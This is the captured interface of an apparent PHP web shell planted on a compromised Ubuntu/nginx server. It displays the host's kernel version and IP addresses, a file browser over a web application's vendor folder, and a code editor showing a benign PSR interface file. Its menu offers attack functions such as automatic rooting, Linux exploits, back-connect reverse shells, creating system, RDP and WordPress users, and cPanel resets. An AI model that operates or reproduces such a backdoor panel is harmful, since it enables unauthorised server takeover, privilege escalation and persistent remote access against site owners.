Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-api /
vendor /
psr /
http-factory /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
RequestFactoryInterface.php
499
B
-rw-rw-r--
ResponseFactoryInterface.php
546
B
-rw-rw-r--
ServerRequestFactoryInterface....
927
B
-rw-rw-r--
StreamFactoryInterface.php
1.38
KB
-rw-rw-r--
UploadedFileFactoryInterface.p...
1.1
KB
-rw-rw-r--
UriFactoryInterface.php
325
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ServerRequestFactoryInterface.php
<?php namespace Psr\Http\Message; interface ServerRequestFactoryInterface { /** * Create a new server request. * * Note that server-params are taken precisely as given - no parsing/processing * of the given values is performed, and, in particular, no attempt is made to * determine the HTTP method or URI, which must be provided explicitly. * * @param string $method The HTTP method associated with the request. * @param UriInterface|string $uri The URI associated with the request. If * the value is a string, the factory MUST create a UriInterface * instance based on it. * @param array $serverParams Array of SAPI parameters with which to seed * the generated request instance. * * @return ServerRequestInterface */ public function createServerRequest(string $method, $uri, array $serverParams = []): ServerRequestInterface; }
Close